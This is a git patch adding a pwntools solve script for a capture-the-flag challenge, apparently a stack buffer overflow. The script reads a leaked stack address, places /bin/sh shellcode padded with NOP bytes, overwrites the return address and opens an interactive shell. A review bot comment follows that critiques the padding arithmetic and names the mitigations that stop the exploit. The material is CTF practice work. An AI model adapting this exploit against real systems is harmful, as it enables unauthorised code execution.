From a70a98afc48c925d5df10df8429fe4ba888f6a0b Mon Sep 17 00:00:00 2001
From: jc
Date: Thu, 20 Mar 2025 21:06:43 +0300
Subject: [PATCH] solve script
---
 random_challs/shellcodeburr/a.py | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 random_challs/shellcodeburr/a.py
diff --git a/random_challs/shellcodeburr/a.py b/random_challs/shellcodeburr/a.py
new file mode 100644
index 0000000..7baa769
--- /dev/null
+++ b/random_challs/shellcodeburr/a.py
@@ -0,0 +1,23 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./chall", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b": ")
+stack_addr = int(r.recvline(), 16)
+log.info("stack_addr: %#x", stack_addr)
+
+# buf
+sc = asm(shellcraft.sh())
+sc += b"\x90"*(88-len(sc))
+buf = sc
+buf += p64(stack_addr)
+s(buf)
+
+r.interactive()
\ No newline at end of file
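Review bot: The padding line `sc += b"\x90"*(88-len(sc))` fails silently when the assembled shellcode is longer than 88 bytes: the multiplier goes negative, no padding is added, and the packed address lands at the wrong offset with no error. Name the constant and check it, e.g. `OFFSET = 88  # buffer start to saved return address in ./chall (confirm)` followed by `assert len(sc) <= OFFSET`. A short header comment stating what the script relies on (presumably that the binary prints its buffer address and runs with an executable stack) would also tell a reader which mitigations, NX and a build without the address leak, make it stop working. `target` is assigned but never used, and the file lacks a trailing newline.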